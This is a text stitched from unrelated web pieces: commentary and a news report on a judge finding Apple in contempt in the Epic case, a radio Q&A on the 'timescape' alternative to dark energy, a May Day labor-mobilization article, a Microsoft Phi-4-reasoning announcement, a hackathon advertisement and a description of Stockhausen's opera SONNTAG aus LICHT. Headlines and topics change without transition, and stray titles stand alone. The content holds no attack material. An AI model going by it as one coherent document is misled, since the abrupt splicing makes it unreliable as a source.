Are the results of this disastrous for Apple’s App Store business? I don’t think so at all. Gonzalez Rogers is demanding that Apple ... do what Phil Schiller recommended they do all along, which is to compete fair and square with purchases available on the web. She’s not demanding they do what, say, Tim Sweeney wanted them to do. She’s basically saying Phil Schiller was right. Read her entire ruling and it’s hard to imagine anyone disagreeing with that.
But are the results of this disastrous for Apple’s reputation and credibility? It sure seems like it. But it would be worse — much worse — for Apple’s reputation if Phil Schiller weren’t still there. Without him, this ruling makes it sound like they’d be lost, both ethically and legally.
I’ll give the final words to Gonzalez Rogers’s own closing:
Apple willfully chose not to comply with this Court’s Injunction. It did so with the express intent to create new anticompetitive barriers which would, by design and in effect, maintain a valued revenue stream; a revenue stream previously found to be anticompetitive. That it thought this Court would tolerate such insubordination was a gross miscalculation. As always, the cover-up made it worse. For this Court, there is no second bite at the apple.
It Is So Ordered.
Wyze pays $255k of tariffs on $167k of floodlights
New measurements of a certain type of supernova seem to indicate that our expanding universe isn't accelerating at all, negating any need to invoke a mysterious 'dark energy' to explain supernovae observations.
Recent observations from 1,550 supernovae fit the new 'timescape' model
This supernova remnant that's about 16,000 light years from Earth is from a particular class of supernovae called type Ia that astronomers use to measure cosmic distances.
(University of Texas/Chandra X-ray Observatory/NASA)
Is dark energy dying? A new theory suggests that the universe has different time zones
There's a cosmic controversy brewing in the universe. It centres around the mysterious force known as "dark energy."
This concept emerged from observations of distant supernovae that, in the late 1990s, seemed to indicate the universe had been expanding at a faster and faster pace ever since the big bang. The observations came from a certain type of supernova that explodes in such a way that astronomers can calculate its distance from us.
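As background (our gloss, not from the article): these type Ia explosions work as "standard candles" because they peak at a nearly uniform intrinsic brightness, so the brightness we measure yields the distance through the distance modulus:

\[
m - M = 5 \log_{10}\!\left(\frac{d}{10\,\mathrm{pc}}\right)
\]

where m is the apparent magnitude observed from Earth, M is the absolute magnitude (roughly −19.3 at peak for a type Ia supernova), and d is the distance in parsecs.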
The picture emerging from that data didn't fit with previous explanations of the universe that theorized its expansion, driven by the big bang, would eventually slow down as gravity took over. This led scientists to come up with the idea that a force they called "dark energy" pushed against gravity to make the universe expand faster and faster, in keeping with the supernovae data.
But since then, astronomers have measured — with greater precision — many more supernovae, as well as other bright objects in the distant universe. Doing so has revealed cracks in the standard model of cosmology that relies on dark energy to explain the data.
Artist's impression of a type Ia supernova where a smaller white dwarf star steals material from a red giant star before, left, and after, right, the explosion.
(ESO)
This has led to a new and different theory, dubbed the "timescape model," that recent research suggests may more accurately describe our universe.
Ryan Ridden, a postdoctoral research fellow at the University of Canterbury in Christchurch, New Zealand, was part of the team behind the recent discovery. Here is part of his conversation with Quirks & Quarks host Bob McDonald.
So here we are 25 years after the original supernovae discoveries. What's proving to be the problem with the idea of dark energy?
So the idea of dark energy is kind of built on a very big assumption that the universe is a kind of featureless fluid. That it's the same in all directions, everywhere, on a certain scale. If you go through and do the equations with this fluid, you need this idea of a dark-energy-like substance to fit observations with the data.
There are cracks starting to emerge with a few different things, like we're starting to see irregularities in the distribution of very distant objects in the universe, which you shouldn't expect if the universe is uniform and the same in all directions.
We're also starting to see problems with other measurements, so measurements of distributions of galaxies in the universe. We expect the distribution of galaxies to be kind of controlled by things that happened very early in the beginning of the universe, when the universe was small, hot and dense, and sound waves could propagate through.
And there was a recent result by the Dark Energy Spectroscopic Instrument, which showed that this idea of dark energy doesn't quite explain their measurements either. They were starting to think that perhaps something like a time-evolving dark energy would be necessary to explain their observations.
The largest 3D map of our universe to date, made with data from the Dark Energy Spectroscopic Instrument (DESI), shows the universe's underlying web-like structure of matter.
(C. Mastro/Claire Lamman/DESI collaboration)
So what our telescopes are seeing and measuring doesn't match the dark energy model, is that the idea?
Yeah. So that's pretty much what it's coming down to. The standard model of cosmology is an incredibly good descriptor of the universe. As with every model, they're only true insofar as they can reproduce the data.
And now that we've got all of these enormous and incredible surveys going on in astronomy that are collecting enormous amounts of data that dwarf any dataset that we've had before, we're starting to test the very limits of this model.
We're starting to see, at least from my perspective, that perhaps the assumptions that we're making to build the standard model of cosmology don't quite match up with what we're seeing in the universe around us.
OK, well, let's go to the alternative explanation that might fit the universe a little better. Tell me about the timescape model. How does it work?
It's fundamentally different from the standard model of cosmology because it abandons this assumption that the universe is the same and uniform in every direction.
Instead, the basis of the timescape model is that, in fact, we see in the universe around us today that there are giant cosmic structures, enormous filaments and walls filled with galaxies and galaxy clusters. And in between those filaments and walls we have giant voids of nothing.
This illustration highlights the cumulative impact galaxy clustering has had on the structure of the universe.
(NASA's Goddard Space Flight Center)
You can imagine it like blowing air into water filled with soap. You get all the bubbles forming on the surface. This is kind of what our universe looks like today. We have galaxies forming along the edges of the bubbles and where the bubbles meet. And then in the middle there is pretty much nothing going on.
So the idea with the timescape model is that these structures will play a significant role in the evolution of our universe. And the way they work is that in general relativity, there's this idea that acceleration or deceleration changes the rate at which time passes for you. So the faster you accelerate, the slower your clock will tick.
So if we go all the way back to the early universe where it was very smooth, hot and dense, there are tiny, tiny differences in that early universe, slightly denser regions and slightly less dense regions.
This [initial] difference in acceleration between the more dense and less dense regions isn't necessarily a lot, but if you fast forward through the history of the universe and measure the cumulative impact that they have, it has quite a significant change on the time that passes in those regions.
A representation of the evolution of the universe since the big bang.
(Wilkinson Microwave Anisotropy Probe consortium/NASA)
It's to the point where for us observers sitting inside dense regions of the universe, we would find that the universe is perhaps around 14.2 billion years old. But for the very middle of these giant voids, you might find that they're 21 billion years old. So time is ticking differently for these different regions.
In the empty spaces, time is passing more quickly than in the dense places where we are...
Yeah, exactly. So it's to do with the deceleration of the universe giving us this timescape of varying times across the universe. Because quite often, we just assume there's one fixed time for the entire universe, that it's around 13.7 billion years old.
But we know from general relativity that these effects must have some kind of impact. So the timescape model goes to the fundamental basics of cosmology, questions the assumptions that were there, and then builds this new model, which incorporates more aspects of general relativity into it.
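To make the "clocks tick differently" idea concrete (our gloss of the standard weak-field result, not the timescape model's full machinery): a clock sitting at gravitational potential Φ accumulates proper time

\[
d\tau \approx \left(1 + \frac{\Phi}{c^{2}}\right) dt, \qquad \Phi < 0 \ \text{inside dense regions},
\]

so clocks inside matter-rich regions run slower than clocks in empty voids. Taking the article's figures at face value, void interiors would have accumulated about 21/14.2 ≈ 1.5 times as much elapsed time as our region.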
So how does this add up to what looks like a universe that's accelerating, that's speeding up?
Yeah, so as the universe is experiencing these different time frames, you also see these dense regions begin to contract. They're getting smaller. Whereas the less dense regions are expanding more or less at the same rate they were at the beginning of the universe.
Data from four telescopes were used to create this image of galaxies in a gravitational dance around each other.
(CXC/NASA/SAO/NASA-JPL/Caltech/ESA/CSA/STScI)
So over time, the total volume of the universe will become dominated by this kind of empty space that's expanding at the same rate.
For observers like us in dense regions, when we look out across these great big void regions, the cumulative effect is that the entire universe "appears" to be accelerating in its expansion, but that's just a result of our position in the universe, this kind of mass-biased position that we have.
ABOUT THE AUTHOR
Sonya Buyting is an award-winning science journalist whose brain is in its happy place when she's working on stories from the cutting edge of science. Sonya is a producer for CBC Radio's weekly science radio show, Quirks & Quarks, who got her start in science journalism on Discovery Channel Canada's Daily Planet and then at the air crash investigation show, Mayday.
Q&A has been edited for length and clarity.
Workers Defy the Billionaire Takeover on May Day
Portside
portside.org
2025-05-01 03:13:42
In Chicago, the teachers union will lead a march starting at 11 a.m. in Unity Park.
This story will be updated as May Day actions take place.
Where are the pitchforks? President Donald Trump’s administration has declared open season on the working class. Its henchmen have unleashed kidnappings by state agents, worksite raids that spread terror and stifle workplace militancy, massive federal layoffs, funding cuts with devastating consequences and attacks on diversity, equity and inclusion, as well as efforts to eliminate collective bargaining rights wholesale. The array of assaults may appear dizzying, but that’s by design: Confusion, division, fear and hopelessness are classic boss tactics, intended to silence dissent and chill organizing. We’re now seeing them on a national scale, as Trump and his cronies work to consolidate power while handing out tax cuts for billionaire pals and giving corporations carte blanche to fleece the public and the services they depend on (including access to medical care). The end game is oligarchy.
Amid the fear and uncertainty, the organized working class, comprising 14 million union members, has largely been quiet or focused on their individual fights. But the scope and horror of attacks on workers have jolted unions to consider new tactics and forge new alliances.
A May Day Strong coalition of over 200 organizations, including major national labor unions and hundreds of community organizations, is planning 1,273 mass mobilizations, from strikes to sit-downs to rallies, across 1,031 cities and towns nationwide on International Workers Day, May 1. Among the anchoring organizations are the Chicago Teachers Union (which first brought groups together), National Education Association, American Federation of Teachers, Communication Workers of America, Association of Flight Attendants-CWA and United Electrical Workers, as well as the Sunrise Movement, the Center for Popular Democracy, Indivisible, and a panoply of other issue-based organizations, from Palestine organizing to reproductive justice to immigrant rights.
Participants will raise the unifying banner “For the Workers, Not the Billionaires,” a nod to the populist message of Occupy Wall Street in 2011, when thousands of people turned out to denounce bankers for the taxpayer-funded bailout.
“For many of the organizations involved with May Day mobilizations, this is the first time we are working outside of our union sector or region, and alongside federal government and private sector locals, with the participation of national community networks and their local affiliates,” wrote Jackson Potter, vice president of the Chicago Teachers Union, in Convergence magazine. CTU is one of the main conveners of the May Day Strong Coalition. The national day of action, Potter continued, “[gives] us new partners to map geographies that have burgeoning union organizing campaigns, nodes of production where workers have disproportionate power, and community forces willing to throw down to defend our democratic rights and institutions.”
In some instances, unions are linking preexisting struggles against billionaire employers, whether university systems, hospitals or the superrich, and tying them to the broader class-wide assaults Trump has turbocharged in his 101 days in office. In others, community organizations and unions are testing out new alliances to bridge specific campaigns to a broader class-struggle orientation that positions working-class people as the countervailing power to billionaire rule. Will this be a dress rehearsal for a possible general strike in May 2028? It’s premature to say in these whirlwind times. But one thing is for sure: Working people will be flexing their collective muscles in a range of arenas in class struggle, from saving Medicaid to standing up for federal workers, nurses, immigrants and any human being whose rights are being trampled on by Trump and his minions. May Day will be a national demonstration that will polarize today’s struggle not along resentful, racist lines of immigrant vs. “native,” but along the class-struggle lines of workers vs. billionaires.
In Chicago, the site of the 1886 Haymarket affair that sparked the May Day holiday, the organizing got started with an in-person convening in March, followed by online meetings that drew thousands of participants. The CTU, Arise Chicago and dozens of other labor unions and community organizations will lead a march at 11 a.m. from Unity Park to Grant Park. The action not only honors the pitched battle for an eight-hour day in 1886, but also the 400,000-person march on May 1, 2006, to defeat a measure criminalizing undocumented immigrants. A loose coalition of immigrant rights organizations in Chicago is organizing one-day strikes, distributing letters through social media and other channels reminding workers of their right to withhold their labor to protest unfair labor practices at their workplaces.
Minnesota will have a full day of actions, including a rally of airport workers at 12 p.m. to stand up to Trump and Musk as well as to corporations like Delta, Uber, Lyft and the Metropolitan Airports Commission. Anchoring organizations include local immigrant rights groups and SEIU Local 26, UNITE HERE Local 17, the Flight Attendants, the Machinists, Teamsters Local 120, and AFGE. Later at 5 p.m., a unity rally at the state Capitol is expected to draw tens of thousands, and will include liberal anti-Trump groups like Indivisible.
In Philadelphia, Sen. Bernie Sanders (I-Vt.) will headline a hundreds-strong rally at City Hall with local labor and immigration-rights leaders. In New Orleans, hundreds of registered nurses at University Medical Center will go on strike as they negotiate for a first contract.
California will see some of the largest actions. Twenty thousand healthcare, research and technical workers across the University of California system have timed their unfair labor practice strike for May 1. Their union, UPTE-CWA Local 9119, is striking because UC announced a systemwide hiring freeze on March 19, 2025, using Trump’s threatened cuts as cover, without giving the union notice or an opportunity to bargain.
UPTE President Dan Russell, who was elected as part of a reform slate in 2021, says the University of California is “using the political climate as an excuse for the behavior that they had already been exhibiting … which is refusing to bargain in good faith to address the staffing crisis, and just continuing to commit, you know, one unfair labor practice after another.”
AFSCME Local 3299, representing more than 37,000 patient care workers across the same UC system, also plans a walk-out on May Day over similar illegal hiring freeze allegations. “The University of California sits on $10 billion in unrestricted reserves,” says Todd Stenhouse, spokesperson for AFSCME 3299. “It has routinely handed out raises of 30-40% to its growing legion of Ivory Tower elites, chancellors and the like. It provides them low-interest home loans. They can use them to buy second homes. And all the while the front liners, the people that answer the call button, people that are sweeping the floors, people that are serving the food, right, are struggling like never before to make ends meet.
“International Workers Day is a time for workers to celebrate the ongoing struggle, but it is also a time to reclaim our voice in a very uncertain time against employers who, frankly, don’t know what it means to walk in our shoes.”
At noon, the expected 60,000 will swell in number as other unions join in solidarity rallies across California, including the United Auto Workers 4811, UC-AFT 1474, Teamsters Local 2010, and the California Nurses Association. There’s also a planned teach-in at 1:30 p.m.
In Georgia, the Union of Southern Service Workers is planning a march on Atlanta City Hall alongside partnering organizations, including the Coalition of Black Trade Unionists, Atlanta Jobs with Justice, United Campus Workers, Georgia Latino Alliance for Human Rights and the Indivisible Project. Planned stops include an immigrant detention center and a local OSHA office.
Katie Giede, an 11-year server at Waffle House and member of the Union of Southern Service Workers, said she would be marching to take on billionaires like Waffle House boss Joe Rogers III. Last year, she and her co-workers
pressured
their employer to raise wages from $2.92 to $5.25 hourly in two years across most markets.
LUIS FELIZ LEON is an associate editor and organizer at Labor Notes.
Apple referred to federal prosecutors after judge rules it violated court order
Guardian
www.theguardian.com
2025-05-01 02:59:01
Judge says executive told ‘outright lies’ when he gave testimony in antitrust case from Fortnite maker Epic Games Apple violated a United States court order that required the iPhone maker to allow greater competition for app downloads and payment methods in its lucrative App Store and will be referr...
Apple violated a United States court order that required the iPhone maker to allow greater competition for app downloads and payment methods in its lucrative App Store and will be referred to federal prosecutors, a federal judge in California ruled on Wednesday.
The US district judge Yvonne Gonzalez Rogers in Oakland said in an 80-page ruling that Apple failed to comply with her prior injunction order, which was imposed in an antitrust lawsuit brought by Fortnite maker Epic Games.
“Apple’s continued attempts to interfere with competition will not be tolerated,” Gonzalez Rogers said. She added: “This is an injunction, not a negotiation. There are no do-overs once a party willfully disregards a court order.”
Gonzalez Rogers referred Apple and one of its executives, Alex Roman, vice-president of finance, to federal prosecutors for a criminal contempt investigation into their conduct in the case.
Roman gave testimony about the steps Apple took to comply with her injunction that was “replete with misdirection and outright lies”, the judge wrote.
Apple and its lawyers did not immediately respond to requests for comment.
The Epic Games chief executive Tim Sweeney called the judge’s order a significant win for developers and consumers.
“It forces Apple to compete with other payment services rather than blocking them, and this is what we wanted all along,” Sweeney told reporters.
Sweeney said Epic Games would aim to bring Fortnite back to the Apple App Store next week. Apple in 2020 had pulled Epic’s account after the company let iPhone users navigate outside Apple’s ecosystem for better payment deals.
Epic accused Apple of stifling competition for app downloads and overcharging commissions for in-app purchases.
Gonzalez Rogers in 2021 found Apple violated a California competition law and ordered the company to allow developers more freedom to direct app users to other payment options. Apple failed last year to persuade the US supreme court to strike down the injunction.
Epic Games told the court in March 2024 that Apple was “blatantly” violating the court’s order, including by imposing a new 27% fee on app developers when Apple customers completed an app purchase outside the App Store. Apple charges developers a 30% commission fee for purchases within the App Store.
Apple also began displaying messages warning customers of the potential danger of external links in order to deter non-Apple payments, Epic Games alleged, calling Apple’s new system “commercially unusable”.
Apple has denied any wrongdoing. The company in a court filing on 7 March told Gonzalez Rogers it had undertaken “extensive efforts” to comply with the injunction “while preserving the fundamental features of Apple’s business model and safeguarding consumers”.
Gonzalez Rogers suggested at an earlier hearing that changes made by Apple to its App Store had no purpose “other than to stifle competition”.
In Wednesday’s ruling, Gonzalez Rogers said Apple is immediately barred from impeding developers’ ability to communicate with users, and the company must not levy its new commission on off-app purchases.
She said Apple cannot ask her to pause her ruling “given the repeated delays and severity of the conduct”. She took no view on whether a criminal case should be opened.
“It will be for the executive branch to decide whether Apple should be deprived of the fruits of its violation, in addition to any penalty geared to deter future misconduct,” the judge wrote.
Show HN: Convert Large CSV/XLSX to JSON or XML in Browser
Microsoft continues to add to the conversation by unveiling its newest models, Phi-4-reasoning, Phi-4-reasoning-plus, and Phi-4-mini-reasoning.
A new era of AI
One year ago, Microsoft introduced small language models (SLMs) to customers with the release of Phi-3 on Azure AI Foundry, leveraging research on SLMs to expand the range of efficient AI models and tools available to customers.
Today, we are excited to introduce Phi-4-reasoning, Phi-4-reasoning-plus, and Phi-4-mini-reasoning—marking a new era for small language models and once again redefining what is possible with small and efficient AI.
Reasoning models, the next step forward
Reasoning models are trained to leverage inference-time scaling to perform complex tasks that demand multi-step decomposition and internal reflection. They excel in mathematical reasoning and are emerging as the backbone of agentic applications with complex multi-faceted tasks. Such capabilities are typically found only in large frontier models. Phi-reasoning models introduce a new category of small language models. Using distillation, reinforcement learning, and high-quality data, these models balance size and performance. They are small enough for low-latency environments yet maintain strong reasoning capabilities that rival much bigger models. This blend allows even resource-limited devices to perform complex reasoning tasks efficiently.
Phi-4-mini-reasoning
Phi-4-mini-reasoning is designed to meet the demand for a compact reasoning model. This transformer-based language model is optimized for mathematical reasoning, providing high-quality, step-by-step problem solving in environments with constrained computing or latency. Fine-tuned with synthetic data generated by the DeepSeek-R1 model, Phi-4-mini-reasoning balances efficiency with advanced reasoning ability. Trained on over one million diverse math problems spanning difficulty levels from middle school to Ph.D., it is ideal for educational applications, embedded tutoring, and lightweight deployment on edge or mobile systems. Try out the model on Azure AI Foundry or HuggingFace today.
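As a rough sketch of what trying the model via HuggingFace can look like in practice, the standard transformers text-generation pipeline applies. The repo id "microsoft/Phi-4-mini-reasoning" is our assumption based on Microsoft's naming convention; verify it on the model card before running.

from transformers import pipeline

# A minimal sketch, not official sample code. The repo id below is an
# assumption from Microsoft's naming; check the model card first.
generator = pipeline(
    "text-generation",
    model="microsoft/Phi-4-mini-reasoning",
    device_map="auto",   # needs the `accelerate` package; uses a GPU if present
    torch_dtype="auto",  # pick an appropriate dtype for the hardware
)

messages = [{"role": "user", "content": "Solve 3x + 5 = 20 step by step."}]

# Reasoning models emit a chain of thought before the final answer,
# so allow a generous generation budget.
out = generator(messages, max_new_tokens=1024)
print(out[0]["generated_text"][-1]["content"])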
Figure 1. The graph compares the performance of various models on popular math benchmarks for long sentence generation. Phi-4-mini-reasoning outperforms its base model on long sentence generation across each evaluation as well as larger models like OpenThinker-7B*, Llama-3.2-3B-instruct, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Llama -8B, and Bespoke-Stratos-7B*. Phi-4-mini-reasoning is comparable to OpenAI o1-mini* across math benchmarks, surpassing the model’s performance during Math-500 and GPQA Diamond evaluations. As seen above, Phi-4-mini-reasoning with 3.8B parameters outperforms models of over twice its size.
For more information about the model, read the technical report that provides additional quantitative insights.
Phi-4-reasoning and Phi-4-reasoning-plus
Phi-4-reasoning is a 14-billion parameter open-weight reasoning model that rivals much larger models on complex reasoning tasks. Trained via supervised fine-tuning of Phi-4 on carefully curated reasoning demonstrations from OpenAI o3-mini, Phi-4-reasoning generates detailed reasoning chains that effectively leverage additional inference-time compute. The model demonstrates that meticulous data curation and high-quality synthetic datasets allow smaller models to compete with larger counterparts. This model is available now on Azure AI Foundry and HuggingFace.
Phi-4-reasoning-plus builds upon Phi-4-reasoning capabilities, further trained with reinforcement learning to utilize more inference-time compute, using 1.5x more tokens than Phi-4-reasoning, to deliver higher accuracy. This model is coming to Azure AI Foundry soon, but is available today on HuggingFace.
Despite their significantly smaller size, both models achieve better performance than OpenAI o1-mini and DeepSeek-R1-Distill-Llama-70B on most benchmarks, including mathematical reasoning and Ph.D.-level science questions. They achieve performance better than the full DeepSeek-R1 model (with 671 billion parameters) on the AIME 2025 test, the 2025 qualifier for the USA Math Olympiad.
Figure 2. Phi-4-reasoning performance across representative reasoning benchmarks spanning mathematical and scientific reasoning. We illustrate the performance gains from reasoning-focused post-training of Phi-4 via Phi-4-reasoning (SFT) and Phi-4-reasoning-plus (SFT+RL), alongside a representative set of baselines from two model families: open-weight models from DeepSeek including DeepSeek R1 (671B Mixture-of-Experts) and its distilled dense variant DeepSeek-R1 Distill Llama 70B, and OpenAI’s proprietary frontier models o1-mini and o3-mini. Phi-4-reasoning and Phi-4-reasoning-plus consistently outperform the base model Phi-4 by significant margins, exceed DeepSeek-R1 Distill Llama 70B (5x larger) and demonstrate competitive performance against significantly larger models such as Deepseek-R1.
Figure 3. Accuracy of models across general-purpose benchmarks for: long input context QA (FlenQA), instruction following (IFEval), Coding (HumanEvalPlus), knowledge & language understanding (MMLUPro), safety detection (ToxiGen), and other general skills (ArenaHard and PhiBench).
Phi-4-reasoning models introduce a major improvement over Phi-4, surpass larger models like DeepSeek-R1-Distill-70B, and approach DeepSeek-R1 across various reasoning and general capabilities, including math, coding, algorithmic problem solving, and planning. The technical report provides extensive quantitative evidence of these improvements through diverse reasoning tasks.
Phi’s evolution over the last year has continually pushed the envelope of quality vs. size, expanding the family with new models to address diverse needs. Across the scale of Windows 11 devices, these models are available to run locally on CPUs and GPUs.
As Windows works towards creating a new type of PC, Phi models have become an integral part of Copilot+ PCs with the NPU-optimized Phi Silica variant. This highly efficient, OS-managed version of Phi is designed to be preloaded in memory, with blazing fast time-to-first-token responses and power-efficient token throughput, so it can be invoked concurrently with other applications running on your PC. It is used in core experiences like Click to Do, providing useful text intelligence tools for any content on your screen, and is available as developer APIs to be readily integrated into applications—already being used in several productivity applications, such as Outlook offering its Copilot summary features offline. These small but mighty models have been optimized and integrated for use across the breadth of our PC ecosystem. The Phi-4-reasoning and Phi-4-mini-reasoning models leverage the low-bit optimizations for Phi Silica and will soon be available to run on Copilot+ PC NPUs.
Safety and Microsoft’s approach to responsible AI
At Microsoft,
responsible AI
is a fundamental principle guiding the development and deployment of AI systems, including our Phi models. Phi models are developed in accordance with Microsoft AI principles: accountability, transparency, fairness, reliability and safety, privacy and security, and inclusiveness.
The Phi family of models has adopted a robust safety post-training approach, leveraging a combination of Supervised Fine-Tuning (SFT), Direct Preference Optimization (DPO), and Reinforcement Learning from Human Feedback (RLHF) techniques. These methods utilize various datasets, including publicly available datasets focused on helpfulness and harmlessness, as well as various safety-related questions and answers. While the Phi family of models is designed to perform a wide range of tasks effectively, it is important to acknowledge that all AI models may exhibit limitations. To better understand these limitations and the measures in place to address them, please refer to the model cards below, which provide detailed information on responsible AI practices and guidelines.
GroMo brings you the FinArva AI Hackathon 2025, powered by AWS - a high-energy, fast-paced challenge to solve India’s toughest financial distribution problems using AI and product innovation.
This is your chance to design intelligent solutions for Bharat's next billion users. Selected participants will get exclusive mentorship, showcase their ideas in front of top fintech leaders, and compete for prizes worth ₹10,00,000+.
The Problem Statement for Phase 1 (Idea Discovery & Concept Submission) can be accessed here: Click Here
Opportunity to get a direct interview with the founders, with CTC up to ₹25 LPA (up to ₹40 LPA for experienced professionals)
Build AI solutions that address real distribution challenges
Get mentored by leaders from GroMo, AWS, and the fintech ecosystem
Present your ideas to a panel of FinTech Leaders
Win cash prizes, goodies, and fast-track career opportunities
Network with peers, leaders & potential employers
Winning Criteria
Problem Understanding: The solution should demonstrate a deep understanding of the real challenges faced by GroMo Partners and should be designed around those needs.
Innovativeness: The idea has to be original, creative, and should bring a fresh approach to solving the problem effectively.
Business Impact: The solution should have strong potential to improve GroMo Partner earnings, efficiency, or experience.
Effective Use of AI: AI should not be just an add-on—it should be central to the solution and used in a meaningful, well-integrated way.
Simplicity & Usability: The product should be easy to use, scalable, and ready to be adopted by GroMo’s wide partner base with minimal friction.
Eligibility
Open to all college students, working professionals, and AI enthusiasts.
The team size for the Hackathon is 3-5 Members.
Individual participants or teams with fewer than 3 members can register and submit proposals in Phase 1. If shortlisted, they will be paired with other participants to form a team of 3–5 members for the in-person hackathon.
About the interview
Phase 1: Idea Discovery & Concept Submission
Registered teams will work on virtual ideation and concept submission focused on understanding GroMo Partners' challenges. The idea needs to cover: the top 3 user problems you're solving; proposed AI-based solutions; why it will work and how it helps increase user earnings; and mocks or a high-level system flow (optional). The submission can be in any format - PDF/Document/PPT/Zip file. Only the team leader will be allowed to make the submission.
29 Apr'25-19 May'25
Phase 2: In-Person Hackathon (Build + Pitch)
Selected teams attend the in-person event in Gurgaon for a 3-day build sprint with GroMo mentors. The travel has to be self-managed by the participants. Lodging & meals will be covered by GroMo. The event will include 48 hours of Unstoppable AI Innovation followed by a Pitch to the Jury.
30 May'25-1 Jun'25
About GroMo
Building India's largest financial products distribution company
Bringing a landslide shift in the $300B+ financial products market in India. GroMo is a Y Combinator (YC21) backed Series-A startup having raised $12M+ in overall funding.
We have backing from several large international funds and notable angel investors such as SIG, Y Combinator, Beyond Next Ventures, Das Capital, Kunal Shah (CRED, Freecharge), Ramakant Sharma (Livspace), Alok Mittal (Indifi, IAN), Nitin Gupta (Uni, founder of PayU), Utsav Somani (AngelList India, iSEED), Niraj Singh (Spinny), Ashish Sharma, and many more.
Both co-founders, Ankit and Darpan, are from IIT Delhi, have entrepreneurship experience in the tech space, and have built (and sold) successful companies in the past.
Our team comprises dedicated ex-entrepreneurs and mavericks who have a passion to build great things and change lives, with varied experience in companies such as Flipkart, Spinny, Policybazaar, Aviva Life, Snapdeal, Oracle, Housing, Unicommerce, Lambda Test, and many more...
At GroMo, we deeply understand how financial products such as demat accounts, savings accounts, loans, insurance, etc. are sold, and we want to empower millions of agents and financial advisors to sell financial products with the power of technology. Our ability to understand what customers want, build fast, and iterate faster makes us stand far apart from our competitors.
It all starts with the right team — a team that deeply cares about values, customers, and each other.
Sunday from Light (1998-2003)
for 10 vocal soloists, boy’s voice, four instrumental soloists
(basset horn, flute, trumpet, synthesizer), two choirs, two orchestras,
electronic music.
SONNTAG aus LICHT (Sunday From Light) is the 7th and final opera in Karlheinz Stockhausen's "7 day" LICHT (Light) opera cycle, following MITTWOCH aus LICHT. SONNTAG is characterized as the "Day of Mystical Union" between the LICHT protagonists MICHAEL and EVE. In the opening Scene of this 5-part production, an orchestra atomizes and rotates the themes of MICHAEL and
EVE, after which a procession of "Angels" praises their union. The scene "Light Pictures"
reflects the courtship between these two characters in a 3-way "shadow-play", and seven "Scents of the
Week" are celebrated. Finally, an orchestra and choir take turns
to finalize this union with "recollections" of scenes from each day of
LICHT. The scenes in SONNTAG do not have a dramatic arc connecting them; instead, the actual theme of union between the characters Michael and Eve is achieved through musical, visual, spatial and even olfactory means.
Scene 1: LICHTER–WASSER (SONNTAGS-GRUSS)/(Light-Waters, or Sunday Greeting)
For soprano, tenor, and orchestra (29 pcs.) with synthesizer. Composed 1998-1999, premiered 1999 during the Donaueschinger Musiktage (Southwest German Radio).
After an introductory duet, the tenor and soprano soloists lead members of the orchestra to appointed locations situated throughout the audience seating area. After each player has reached his/her spot, a candle is lit (the "Light" of the title). During this opening ritual a complex harmony slowly builds from broad held figures. The main section of this Scene is characterized by short melodic fragments (based on the LICHT Michael and Eve melody themes) passed around by members of the orchestra in two layers. This results in "waves" of melodies circling around the audience hall in separate tempos. This structure is interrupted by several soloistic interludes, as well as a section where some musicians "ascend" to an elevated stage for a narrative scene. At the end, each player drinks from a bowl of water (the "Water" of the title) and departs.
Scene 2: ENGEL-PROZESSIONEN (Angel Processions)
For choir (a cappella). Composed 2000, premiered 2002 at the Concertgebouw in Amsterdam.
In ENGEL-PROZESSIONEN, the setting is a hall lined with a mixed choir along the rear and side walls (a "Tutti Choir"), singing slow, quiet tones and aleatoric syllables. Promenading through the audience are 7 singing "Angel Choirs" (choir groups of 4 to 6 singers) using texts from 7 different languages. A tenor and soprano lead the choir members in synchronized hand gestures. The 7th Angel Choir, the Angels of Joy, also sometimes sings from the balcony (echoing the "elevated" section of the 1st Scene). During this Scene, the 7 Angel Choirs sing in various vocal combinations (layered configurations of 2-part polyphony) while promenading in ritualistic fashion throughout the performance space. Since the theme of SONNTAG AUS LICHT is "mystical union", the polyphonic EVE and MICHAEL layers of each Angel Choir gradually meld together (Duality to unity) as the Scene progresses into a homophonic texture at the end, at which point each Angel Choir proceeds up the middle of the hall and converges, bringing irises and lilies to form a mountain of flowers.
Scene 3: LICHT-BILDER (Light Pictures)
For tenor vocalist, trumpet with ring-modulation, basset-horn, and flute/alto flute with ring-modulation. Composed 2002-2003, premiered 2004.
In this Scene, the tenor vocalist and basset-horn soloist navigate through "backwards-ordered" fragments of the Michael and Eve themes. The trumpet and flute play staggered variations of the tenor and basset-horn (effectively acting as rippling "reflections"). The sounds of the trumpet and flute are also processed through a digital ring-modulation effect, which adds a further "warped reflection" to the musical texture (these sounds are projected from the rear of the hall). Throughout this performance the performers also move about the space in motions reflective of the musical material. Divided into 7 sections (one for each day of the week), the polyphonic texture of this Scene is broken up by several interludes based on harmonized duos, trios and quartets. The libretto sung by the tenor soloist is made up of non-grammatical words and phrases which praise God and correspond to the "essences of seven spheres of life".
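Ring modulation itself is simple to state in code. A minimal sketch (ours, with an arbitrary carrier frequency and sample rate): the input is multiplied by a sine-wave carrier, which replaces each input frequency f with the pair f ± f_carrier, the source of the "warped reflection" timbre.

import numpy as np

def ring_modulate(signal: np.ndarray, carrier_hz: float, sample_rate: int = 44100) -> np.ndarray:
    # Multiply the input by a sine carrier: sin(a)*sin(b) produces
    # sum and difference frequencies (a+b and a-b).
    t = np.arange(len(signal)) / sample_rate
    return signal * np.sin(2 * np.pi * carrier_hz * t)

# A 440 Hz tone modulated by a 150 Hz carrier yields partials at 290 Hz and 590 Hz.
t = np.arange(44100) / 44100
tone = np.sin(2 * np.pi * 440 * t)
warped = ring_modulate(tone, carrier_hz=150.0)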
Scene 4: DÜFTE - ZEICHEN (Scents - Signs)
For 7 vocalists, boy’s voice, synthesizer. Composed 2002, premiered 2003 at the Salzburg Festival.
In this Scene, Stockhausen celebrates each of the 7 Days of the Week with its own Scent and an explanation of its Sign. The main body of this Scene features six vocalists singing in solos, duets and trios, each containing text describing the basic themes of each Day of the Week. During each of the 7 primary "song-scenes" incense is lit (aromatic bowl), banners are unfurled, and hand gestures are made. These songs are separated and supported by ensemble sequences in free-rhythms. A synthesizer adds various embellishments to each of the songs, becoming more and more complex as the Scene develops. At the end are 2 additional songs where a youth from the audience is taken into the sky on a flying horse (the alto song sequence also features a richly-harmonized "Overtone Chant").
Scene 5: HOCH-ZEITEN ("High-Times", or "Wedding/Marriage")
For choir and orchestra. Composed 2001-2002, premiered 2003 at Las Palmas.
